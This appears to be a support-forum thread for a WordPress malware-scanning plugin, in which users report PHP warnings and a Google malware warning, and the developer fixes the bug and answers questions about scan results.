Warning: array_merge() [function.array-merge]: Argument #1 is not an array in …/wp-content/plugins/gotmls/index.php on line 432
Warning: implode() [function.implode]: Invalid arguments passed in …/wp-content/plugins/gotmls/index.php on line 470
When I run the scan, a whole slew of warnings appear about the plugin. Let me know. Thanks, Art
Thanks for reporting this bug. I just fixed it in my newest release (version 1.2.04.08).
Thanks so much for the update; it now works fine. Art
Usually the Potential Threats are ok. If you find Known Threats and remove them then you site will likely come up clean. You can request a review from Google in your Webmaster Tools account if you are still getting warnings from the search engine.
The warning from Google is gone! You are a genious. I am now telling everyone in my vast networks on Facebook, LinkedIn, XING and Twitter to download your plug in, pronto!
it´s done and all is working perfect thank you
I found this on some pages that are supposed to be completely blank:
That is just the HTML code for a [SPACE] so it is not malicious or anything you should be worrying about (the WordPress Post Editor will insert that code by default when it thing it is needed).
Muchísimas gracias. Works.